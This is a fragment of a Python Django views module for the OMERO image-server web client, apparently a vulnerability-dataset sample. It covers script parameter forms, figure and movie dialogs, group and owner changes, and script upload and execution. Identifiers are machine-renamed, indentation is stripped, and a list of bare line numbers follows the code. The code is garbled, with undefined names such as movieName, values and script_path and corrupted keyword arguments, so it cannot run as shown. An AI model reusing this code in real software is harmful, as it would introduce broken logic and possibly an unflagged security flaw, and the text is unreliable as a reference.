VAR_208["institutions"] = ", ".join([VAR_318 for VAR_318 in VAR_73.institutions])
VAR_209 = [] # use a list so we can sort by 'grouping'
VAR_210 = None
VAR_211 = None
for VAR_310, VAR_320 in VAR_73.inputs.items():
VAR_318 = {}
VAR_318["name"] = VAR_310.replace("_", " ")
VAR_318["key"] = VAR_310
if not VAR_320.optional:
VAR_318["required"] = True
VAR_318["description"] = VAR_320.description
if VAR_320.min:
VAR_318["min"] = VAR_345(VAR_320.min.getValue())
if VAR_320.max:
VAR_318["max"] = VAR_345(VAR_320.max.getValue())
if VAR_320.values:
VAR_318["options"] = [VAR_414.getValue() for VAR_414 in VAR_320.values.getValue()]
if VAR_320.useDefault:
VAR_318["default"] = unwrap(VAR_320.prototype)
if isinstance(VAR_318["default"], omero.model.IObject):
VAR_318["default"] = None
VAR_319 = unwrap(VAR_320.prototype)
if VAR_319.__class__.__name__ == "dict":
VAR_318["map"] = True
elif VAR_319.__class__.__name__ == "list":
VAR_318["list"] = True
if "default" in VAR_318:
VAR_318["default"] = ",".join([VAR_345(VAR_362) for VAR_362 in VAR_318["default"]])
elif isinstance(VAR_319, bool):
VAR_318["boolean"] = True
elif isinstance(VAR_319, int) or isinstance(VAR_319, VAR_241):
VAR_318["number"] = "number"
elif isinstance(VAR_319, float):
VAR_318["number"] = "float"
if VAR_2.GET.get(VAR_310, None) is not None:
VAR_318["default"] = VAR_2.GET.get(VAR_310, None)
VAR_318["prototype"] = unwrap(VAR_320.prototype)
VAR_318["grouping"] = VAR_320.grouping
VAR_209.append(VAR_318)
if VAR_310 == "IDs":
VAR_211 = VAR_318 # remember these...
if VAR_310 == "Data_Type":
VAR_210 = VAR_318
VAR_209.sort(VAR_310=lambda VAR_318: VAR_318["grouping"])
if (
VAR_210 is not None
and VAR_211 is not None
and "options" in VAR_210
):
VAR_211["default"] = ""
for VAR_215 in VAR_210["options"]:
if VAR_2.GET.get(VAR_215, None) is not None:
VAR_210["default"] = VAR_215
VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
break # only use the first match
if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
if "Image" in VAR_210["options"]:
VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
VAR_322 = 0
try:
VAR_322 = int(VAR_2.GET.get("Index", 0))
except Exception:
pass
VAR_113 = VAR_6.getObjects("Well", VAR_214)
VAR_304 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
VAR_210["default"] = "Image"
VAR_211["default"] = ",".join(VAR_304)
for VAR_318 in range(len(VAR_209)):
if len(VAR_209) <= VAR_318:
break
VAR_320 = VAR_209[VAR_318]
VAR_321 = VAR_320["grouping"] # E.g 03
VAR_320["children"] = list()
while len(VAR_209) > VAR_318 + 1:
VAR_368 = VAR_209[VAR_318 + 1]["grouping"] # E.g. 03.1
if VAR_368.split(".")[0] == VAR_321:
VAR_320["children"].append(VAR_209[VAR_318 + 1])
VAR_209.pop(VAR_318 + 1)
else:
break
VAR_208["inputs"] = VAR_209
return {
"template": "webclient/VAR_203/FUNC_68.html",
"paramData": VAR_208,
"scriptId": VAR_42,
}
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_43, VAR_6=None, **VAR_7):
VAR_212 = VAR_2.GET.get("Image", None) # comma - delimited list
VAR_213 = VAR_2.GET.get("Dataset", None)
VAR_214 = VAR_2.GET.get("Well", None)
if VAR_214 is not None:
VAR_214 = [VAR_241(VAR_318) for VAR_318 in VAR_214.split(",")]
VAR_113 = VAR_6.getObjects("Well", VAR_214)
VAR_322 = getIntOrDefault(VAR_2, "Index", 0)
VAR_212 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
VAR_212 = ",".join(VAR_212)
if VAR_212 is None and VAR_213 is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def FUNC_86(VAR_215, VAR_187):
VAR_323 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
VAR_324 = {}
for VAR_38 in VAR_6.getObjects(VAR_215, VAR_323):
VAR_324[VAR_38.id] = VAR_38
VAR_325 = [VAR_41 for VAR_41 in VAR_323 if VAR_41 in VAR_324.keys()]
if len(VAR_325) == 0:
raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
else:
VAR_335 = list(VAR_324.values())[0].getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_335)
return VAR_325, VAR_324
VAR_53 = {}
if VAR_212 is not None:
VAR_212, VAR_326 = FUNC_86("Image", VAR_212)
VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_212])
VAR_53["dtype"] = "Image"
if VAR_213 is not None:
VAR_213, VAR_327 = FUNC_86("Dataset", VAR_213)
VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_213])
VAR_53["dtype"] = "Dataset"
if VAR_43 == "SplitView":
VAR_328 = "/omero/figure_scripts/Split_View_Figure.py"
VAR_54 = "webclient/VAR_203/split_view_figure.html"
VAR_329 = [] # A list of VAR_158 about each VAR_142.
for VAR_430 in VAR_212:
VAR_158 = {"id": VAR_430}
VAR_369 = VAR_326[VAR_430]
VAR_158["name"] = VAR_369.getName()
VAR_164 = [
VAR_180.getTextValue()
for VAR_180 in VAR_369.listAnnotations()
if VAR_180._obj.__class__ == omero.model.TagAnnotationI
]
VAR_158["tags"] = VAR_164
VAR_158["datasets"] = [VAR_362.getName() for VAR_362 in VAR_369.listParents()]
VAR_329.append(VAR_158)
VAR_142 = VAR_326[VAR_212[0]]
VAR_53["imgDict"] = VAR_329
VAR_53["image"] = VAR_142
VAR_53["channels"] = VAR_142.getChannels()
elif VAR_43 == "Thumbnail":
VAR_328 = "/omero/figure_scripts/Thumbnail_Figure.py"
VAR_54 = "webclient/VAR_203/thumbnail_figure.html"
def FUNC_89(VAR_212):
VAR_406 = VAR_6.getAnnotationLinks("Image", parent_ids=VAR_212)
VAR_407 = {} # VAR_101 VAR_164. {VAR_26: [VAR_164]}
VAR_408 = {}
for VAR_430 in VAR_212:
VAR_407[VAR_430] = []
for VAR_344 in VAR_406:
VAR_382 = VAR_344.getChild()
if VAR_382._obj.__class__ == omero.model.TagAnnotationI:
VAR_408[VAR_382.id] = VAR_382
VAR_407[VAR_344.getParent().id].append(VAR_382)
VAR_409 = []
for VAR_430 in VAR_212:
VAR_409.append({"id": VAR_430, "tags": VAR_407[VAR_430]})
VAR_164 = []
for tId, VAR_431 in VAR_408.items():
VAR_164.append(VAR_431)
return VAR_409, VAR_164
VAR_370 = [] # multiple collections of VAR_106
VAR_164 = []
VAR_371 = "Thumbnail_Figure"
if VAR_213 is not None:
for VAR_362 in VAR_6.getObjects("Dataset", VAR_213):
VAR_304 = [VAR_318.id for VAR_318 in VAR_362.listChildren()]
VAR_409, VAR_410 = FUNC_89(VAR_304)
VAR_370.append({"name": VAR_362.getName(), "imageTags": VAR_409})
VAR_164.extend(VAR_410)
VAR_371 = VAR_370[0]["name"]
else:
VAR_409, VAR_410 = FUNC_89(VAR_212)
VAR_370.append({"name": "images", "imageTags": VAR_409})
VAR_164.extend(VAR_410)
VAR_411 = VAR_6.getObject("Image", VAR_212[0]).getParent()
VAR_371 = VAR_411.getName() or "Thumbnail Figure"
VAR_53["parent_id"] = VAR_411.getId()
VAR_372 = set() # remove duplicates
VAR_373 = []
for VAR_431 in VAR_164:
if VAR_431.id not in VAR_372:
VAR_373.append(VAR_431)
VAR_372.add(VAR_431.id)
VAR_373.sort(VAR_310=lambda x: x.getTextValue().lower())
VAR_53["thumbSets"] = VAR_370
VAR_53["tags"] = VAR_373
VAR_53["figureName"] = VAR_371.replace(" ", "_")
elif VAR_43 == "MakeMovie":
VAR_328 = "/omero/export_scripts/Make_Movie.py"
VAR_54 = "webclient/VAR_203/make_movie.html"
VAR_142 = VAR_6.getObject("Image", VAR_212[0])
VAR_412 = VAR_142.getName().rsplit(".", 1)
if len(VAR_412) > 1 and len(VAR_412[1]) > 3:
VAR_412 = ".".join(VAR_412)
else:
VAR_412 = movieName[0]
VAR_53["movieName"] = os.path.basename(VAR_412)
VAR_282 = []
for VAR_382 in VAR_142.getChannels():
VAR_282.append(
{
"active": VAR_382.isActive(),
"color": VAR_382.getColor().getHtml(),
"label": VAR_382.getLabel(),
}
)
VAR_53["channels"] = VAR_282
VAR_53["sizeT"] = VAR_142.getSizeT()
VAR_53["sizeZ"] = VAR_142.getSizeZ()
VAR_202 = VAR_6.getScriptService()
VAR_42 = VAR_202.getScriptID(VAR_328)
if VAR_42 < 0:
raise AttributeError("No script found for VAR_314 '%s'" % VAR_328)
VAR_53["template"] = VAR_54
VAR_53["scriptId"] = VAR_42
return VAR_53
@login_required()
@render_response()
def FUNC_70(VAR_2, VAR_27, VAR_6=None, **VAR_7):
VAR_216 = {}
for VAR_215 in ("Image", "Dataset", "Project"):
VAR_187 = VAR_2.GET.get(VAR_215, None)
if VAR_187 is not None:
VAR_216[VAR_215] = [int(VAR_318) for VAR_318 in VAR_187.split(",")]
VAR_217 = VAR_6.getContainerService().getImagesBySplitFilesets(
VAR_216, None, VAR_6.SERVICE_OPTS
)
VAR_218 = []
for fsId, splitIds in VAR_217.items():
VAR_218.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
VAR_53 = {"split_filesets": VAR_218}
VAR_53["action"] = VAR_27
if VAR_27 == "chgrp":
VAR_53["action"] = "move"
VAR_53["template"] = "webclient/FUNC_63/" "fileset_check_dialog_content.html"
return VAR_53
def FUNC_71(
VAR_6, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
VAR_73 = omero.sys.ParametersI()
VAR_74 = VAR_6.getQueryService()
VAR_44 = set(VAR_44)
VAR_45 = set(VAR_45)
VAR_46 = set(VAR_46)
VAR_219 = set([])
VAR_48 = set(VAR_48)
VAR_47 = set(VAR_47)
if VAR_44:
VAR_73.map = {}
VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
VAR_75 = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_45.add(e[0].val)
if VAR_47:
VAR_73.map = {}
VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
VAR_75 = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_48.add(e[0].val)
if VAR_45:
VAR_73.map = {}
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_75 = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
if e[1] is not None:
VAR_219.add(e[1].val)
if VAR_48:
VAR_73.map = {}
VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
VAR_75 = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
if VAR_219:
VAR_73.map = {}
VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
VAR_75 = """
select VAR_142.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.fileset.id in (select VAR_364.id
from Image im
join im.fileset VAR_364
where VAR_364.id in (:fsids)
VAR_101 by VAR_364.id
having count(im.id)>1)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
VAR_220 = set([])
VAR_221 = False
if VAR_46:
VAR_73.map = {
"iids": rlist([rlong(x) for x in VAR_46]),
}
VAR_330 = ""
if VAR_45:
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_330 = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
VAR_75 = (
"""
select distinct dilink.parent.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.id in (:VAR_153)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:VAR_153)) = 0
"""
% VAR_330
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
if e:
VAR_220.add(e[0].val)
else:
VAR_221 = True
VAR_222 = set([])
if VAR_45:
VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
VAR_331 = ""
if VAR_44:
VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
VAR_331 = "and pdlink.parent.id not in (:pids)"
VAR_75 = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% VAR_331
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_222.add(e[0].val)
VAR_223 = {
"remove": {
"project": list(VAR_44),
"dataset": list(VAR_45),
"screen": list(VAR_47),
"plate": list(VAR_48),
"image": list(VAR_46),
},
"childless": {
"project": list(VAR_222),
"dataset": list(VAR_220),
"orphaned": VAR_221,
},
}
return VAR_223
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_6=None, **VAR_7):
return FUNC_73(VAR_2, VAR_27="chgrp", VAR_6=conn, **VAR_7)
@require_POST
@login_required()
def FUNC_73(VAR_2, VAR_27, VAR_6=None, **VAR_7):
VAR_224 = {}
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_224[VAR_215] = VAR_144
if VAR_27 == "chgrp":
VAR_332 = getIntOrDefault(VAR_2, "group_id", None)
elif VAR_27 == "chown":
VAR_332 = getIntOrDefault(VAR_2, "owner_id", None)
VAR_84 = VAR_6.submitDryRun(VAR_27, VAR_224, VAR_332)
VAR_198 = VAR_345(VAR_84)
return HttpResponse(VAR_198)
@login_required()
def FUNC_74(VAR_2, VAR_6=None, **VAR_7):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, VAR_313=405)
VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
if VAR_20 is None:
return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
VAR_20 = VAR_241(VAR_20)
def FUNC_87(VAR_71):
for VAR_431 in ["Dataset", "Image", "Plate"]:
VAR_187 = VAR_71.POST.get(VAR_431, None)
if VAR_187 is not None:
for o in list(VAR_6.getObjects(VAR_431, VAR_187.split(","))):
return o.getDetails().owner.id.val
VAR_101 = VAR_6.getObject("ExperimenterGroup", VAR_20)
VAR_226 = VAR_2.POST.get("new_container_name", None)
VAR_227 = VAR_2.POST.get("new_container_type", None)
VAR_228 = None
VAR_229 = FUNC_87(VAR_2)
VAR_6.SERVICE_OPTS.setOmeroUser(VAR_229)
if (
VAR_226 is not None
and len(VAR_226) > 0
and VAR_227 is not None
):
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_20)
VAR_228 = VAR_6.createContainer(VAR_227, VAR_226)
if VAR_228 is None:
VAR_332 = VAR_2.POST.get("target_id", None)
VAR_228 = VAR_332 is not None and VAR_332.split("-")[1] or None
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_305 = VAR_2.POST.getlist("fileset")
if len(VAR_305) > 0:
if VAR_215 == "Dataset":
VAR_6.regroupFilesets(dsIds=VAR_144, VAR_305=fsIds)
else:
for VAR_364 in VAR_6.getObjects("Fileset", VAR_305):
VAR_144.extend([VAR_318.id for VAR_318 in VAR_364.copyImages()])
VAR_144 = list(set(VAR_144)) # remove duplicates
VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
VAR_84 = VAR_6.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
VAR_198 = VAR_345(VAR_84)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chgrp",
"group": VAR_101.getName(),
"to_group_id": VAR_20,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
VAR_44 = VAR_2.POST.get("Project", [])
VAR_45 = VAR_2.POST.get("Dataset", [])
VAR_46 = VAR_2.POST.get("Image", [])
VAR_47 = VAR_2.POST.get("Screen", [])
VAR_48 = VAR_2.POST.get("Plate", [])
if VAR_44:
project_ids = [VAR_241(x) for x in VAR_44.split(",")]
if VAR_45:
dataset_ids = [VAR_241(x) for x in VAR_45.split(",")]
if VAR_46:
image_ids = [VAR_241(x) for x in VAR_46.split(",")]
if VAR_47:
screen_ids = [VAR_241(x) for x in VAR_47.split(",")]
if VAR_48:
plate_ids = [VAR_241(x) for x in VAR_48.split(",")]
VAR_230 = FUNC_71(
VAR_6,
VAR_44,
VAR_45,
VAR_46,
VAR_47,
VAR_48,
VAR_2.session.get("user_id"),
)
return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_75(VAR_2, VAR_6=None, **VAR_7):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, VAR_313=405)
VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
if VAR_231 is None:
return JsonResponse({"Error": "chown: No VAR_231 specified"})
VAR_231 = int(VAR_231)
VAR_232 = VAR_6.getObject("Experimenter", VAR_231)
if VAR_232 is None:
return JsonResponse({"Error": "chown: Experimenter not found" % VAR_231})
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
VAR_233 = []
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
VAR_84 = VAR_6.chownObjects(VAR_215, VAR_144, VAR_231)
VAR_198 = VAR_345(VAR_84)
VAR_233.append(VAR_198)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chown",
"owner": VAR_232.getFullName(),
"to_owner_id": VAR_231,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_76(VAR_2, VAR_42, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_50 = {}
VAR_49 = VAR_241(VAR_42)
try:
VAR_73 = VAR_202.getParams(VAR_49)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script")
return JsonResponse(VAR_174)
else:
raise
VAR_73 = VAR_202.getParams(VAR_49)
VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
VAR_234 = (
"file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
)
VAR_235 = None
if VAR_234 is not None and VAR_234 != "":
VAR_104 = BaseContainer(VAR_6)
VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
for VAR_310, VAR_320 in VAR_73.inputs.items():
VAR_333 = VAR_320.prototype
VAR_334 = VAR_333.__class__
if VAR_310 == "File_Annotation" and VAR_235 is not None:
VAR_50[VAR_310] = VAR_334(VAR_345(VAR_235))
continue
if VAR_334 == omero.rtypes.RBoolI:
VAR_374 = VAR_310 in VAR_2.POST
VAR_50[VAR_310] = VAR_334(VAR_374)
continue
if VAR_334.__name__ == "RMapI":
VAR_375 = "%s_key0" % VAR_310
VAR_376 = "%s_value0" % VAR_310
VAR_377 = 0
VAR_378 = {}
while VAR_375 in VAR_2.POST:
VAR_413 = VAR_345(VAR_2.POST[VAR_375])
VAR_414 = VAR_2.POST[VAR_376]
if len(VAR_413) > 0 and len(VAR_414) > 0:
VAR_378[VAR_345(VAR_413)] = VAR_414
VAR_377 += 1
VAR_375 = "%s_key%d" % (VAR_310, VAR_377)
VAR_376 = "%s_value%d" % (VAR_310, VAR_377)
if len(VAR_378) > 0:
VAR_50[VAR_310] = wrap(VAR_378)
continue
if VAR_310 in VAR_2.POST:
if VAR_334 == omero.rtypes.RListI:
VAR_415 = VAR_2.POST.getlist(VAR_310)
if len(VAR_415) == 0:
continue
if len(VAR_415) == 1: # process comma-separated list
if len(VAR_415[0]) == 0:
continue
VAR_415 = values[0].split(",")
VAR_416 = omero.rtypes.RStringI
VAR_417 = VAR_333.val # list
if len(VAR_417) > 0:
VAR_416 = VAR_417[0].__class__
if VAR_416 == int(1).__class__:
VAR_416 = omero.rtypes.rint
if VAR_416 == VAR_241(1).__class__:
VAR_416 = omero.rtypes.rlong
VAR_418 = []
for VAR_414 in VAR_415:
try:
VAR_38 = VAR_416(VAR_414.strip())
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_414))
continue
if isinstance(VAR_38, omero.model.IObject):
VAR_418.append(omero.rtypes.robject(VAR_38))
else:
VAR_418.append(VAR_38)
VAR_50[VAR_310] = omero.rtypes.rlist(VAR_418)
else:
VAR_374 = VAR_2.POST[VAR_310]
if len(VAR_374) == 0:
continue
try:
VAR_50[VAR_310] = VAR_334(VAR_374)
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_374))
continue
if "IDs" in VAR_50 and "Data_Type" in VAR_50:
VAR_335 = VAR_6.SERVICE_OPTS.getOmeroGroup()
VAR_6.SERVICE_OPTS.setOmeroGroup("-1")
try:
VAR_379 = VAR_6.getObject(
VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
)
VAR_380 = VAR_379.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_380)
except Exception:
VAR_0.debug(traceback.format_exc())
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_335)
try:
VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
except Exception:
pass
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43)
return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_77(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
return {"template": "webclient/VAR_203/upload_script.html"}
VAR_236 = VAR_2.POST.get("script_path")
VAR_237 = VAR_2.FILES["script_file"]
VAR_237.seek(0)
VAR_238 = VAR_237.read().decode("utf-8")
if not VAR_236.endswith("/"):
VAR_236 = script_path + "/"
VAR_236 = script_path + VAR_237.name
VAR_202 = VAR_6.getScriptService()
VAR_239 = VAR_202.getScriptID(VAR_236)
try:
if VAR_239 > 0:
VAR_173 = OriginalFileI(VAR_239, False)
VAR_202.editScript(VAR_173, VAR_238)
VAR_381 = "Script Replaced: %s" % VAR_237.name
else:
VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
VAR_381 = "Script Uploaded: %s" % VAR_237.name
except omero.ValidationException as ex:
VAR_381 = VAR_345(ex)
return {"Message": VAR_381, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_78(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_49 = VAR_202.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is not None:
VAR_335 = VAR_142.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_335)
VAR_212 = [VAR_241(VAR_26)]
VAR_50 = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in VAR_212]),
}
VAR_50["Format"] = wrap("OME-TIFF")
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Create OME-TIFF")
return JsonResponse(VAR_174)
def FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script"):
VAR_2.session.modified = True
VAR_202 = VAR_6.getScriptService()
try:
VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_6.SERVICE_OPTS)
VAR_198 = VAR_345(VAR_84)
VAR_313 = "in progress"
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_313,
}
VAR_2.session.modified = True
except Exception as x:
VAR_198 = VAR_345(time()) # E.g. 1312803670.6076391
VAR_381 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if VAR_381 and VAR_381.startswith("No processor available"):
VAR_0.info(traceback.format_exc())
VAR_57 = "No Processor Available"
VAR_313 = "no processor available"
VAR_381 = "" # VAR_54 displays VAR_381 and VAR_344
else:
VAR_0.error(traceback.format_exc())
VAR_57 = traceback.format_exc()
VAR_313 = "failed"
VAR_381 = x.message
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_313,
"Message": VAR_381,
"error": VAR_57,
}
return {"status": VAR_313, "error": VAR_57}
return {"jobId": VAR_198, "status": VAR_313}
@login_required()
@render_response()
def FUNC_80(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_240 = list(
VAR_6.getAnnotationLinks(
"Image", [VAR_26], VAR_90=omero.constants.namespaces.NSOMETIFF
)
)
VAR_172 = {}
if len(VAR_240) > 0:
VAR_240.sort(VAR_310=lambda x: x.getId(), VAR_350=True)
VAR_336 = VAR_240[0]
VAR_293 = VAR_336.creationEventDate()
VAR_34 = VAR_336.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
VAR_31 = VAR_350("download_annotation", args=[VAR_34])
VAR_172 = {
"created": VAR_345(VAR_293),
"ago": ago(VAR_293),
"id": VAR_34,
"download": VAR_31,
}
return VAR_172 # will FUNC_81 returned as json by VAR_4
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
38,
40,
43,
47,
49,
66,
67,
79,
84,
86,
90,
92,
107,
124,
126,
131,
133,
135,
136,
137,
139,
140,
145,
154,
155,
159,
160,
166,
167,
172,
177,
178,
179,
180,
181,
182,
187,
197,
199,
200,
201,
202,
203,
204,
217,
220,
226,
233,
234,
235,
236,
237,
245,
248,
250,
251,
261,
267,
288,
291,
297,
315,
317,
318,
322,
323,
324,
326,
327,
339,
340,
356,
357,
377,
378,
385,
399,
400,
401,
403,
413,
421,
423,
424,
426,
427,
432,
433,
435,
436,
438,
443,
444,
446,
447,
450,
451,
457,
458,
459,
463,
464,
466,
470,
471,
475,
481,
490,
493,
498,
500,
504,
506,
507,
516,
537,
539,
540,
545,
546,
556,
569,
572,
580,
581,
584,
591,
593,
603,
605,
606,
609,
614,
616,
620,
627,
634,
635,
638,
646,
647,
648,
649,
650,
651,
652,
655,
658,
666,
667,
676,
677,
685,
686,
695,
706,
722,
724,
725,
728,
736,
739,
741,
751,
753,
754,
764,
766,
779,
782,
783,
784,
785,
786,
788,
790,
810,
812,
813,
816,
824,
827,
829,
839,
841,
842,
845,
852,
853,
854,
857,
859,
869,
871,
872,
880,
881,
882,
898,
901,
903,
904,
915,
917,
924,
925,
930,
931,
964,
965,
976,
977,
989,
993,
995,
1000,
1001,
1009,
1011,
1012,
1013,
1014,
1023,
1029,
1035,
1037,
1044,
1046,
1053,
1054,
1061,
1063,
1064,
1070,
1072,
1073,
1074,
1089,
1093,
1094,
1098,
1106,
1107,
1109,
1111,
1112,
1119,
1128,
1133,
1145,
1147,
1148,
1154,
1158,
1162,
1171,
1172,
1183,
1186,
1204,
1205,
1212,
1213,
1221,
1233,
1235,
1249,
1250,
1266,
1268,
1269,
1272,
1277,
1279,
1287,
1292,
1299,
1301,
1302,
1305,
1316,
1319,
1334,
1336,
1337,
1340,
1348,
1349,
1350,
1351,
1352,
1354,
1358,
1368,
1370,
1371,
1379,
1380,
1382,
1383,
1384,
1389,
1394,
1395,
1397,
1399,
1400,
1408,
1409,
1417,
1425,
1429,
1430,
1442,
1455,
1461,
1468,
1469,
1471,
1475,
1476,
1477,
1482,
1490,
1491,
1498,
1500,
1502,
1503,
1508,
1509,
1512,
1516,
1519,
1520,
1528,
1530,
1538,
1542,
1547,
1559,
1560,
1563,
1564,
1565,
1576,
1577,
1578,
1606,
1608,
1610,
1619,
1620,
1630,
1631,
1633,
1635,
1636,
1657,
1658,
1659,
1670,
1682,
1705,
1712,
1717,
1718,
1726,
1727,
1729,
1735,
1739,
1743,
1747,
1748,
1772,
1779,
1780,
1790,
1794,
1795,
1816,
1827,
1831,
1832,
1836,
1859,
1884,
1900,
1926,
1927,
1938,
1952,
1954,
1959,
1962,
1982,
1994,
1997,
2025,
2030,
2044,
2064,
2065,
2080,
2081,
2085,
2089,
2101,
2104,
2105,
2106,
2107,
2108,
2109,
2110,
2111,
2112,
2113,
2114,
2115,
2116,
2117,
2118,
2119,
2120,
2121,
2122,
2178,
2179,
2196,
2197,
2206,
2208,
2209,
2226,
2227,
2237,
2250,
2275,
2276,
2298,
2299,
2300,
2305,
2309,
2310,
2311,
2333,
2342,
2349,
2350,
2355,
2357,
2359,
2362,
2367,
2379,
2386,
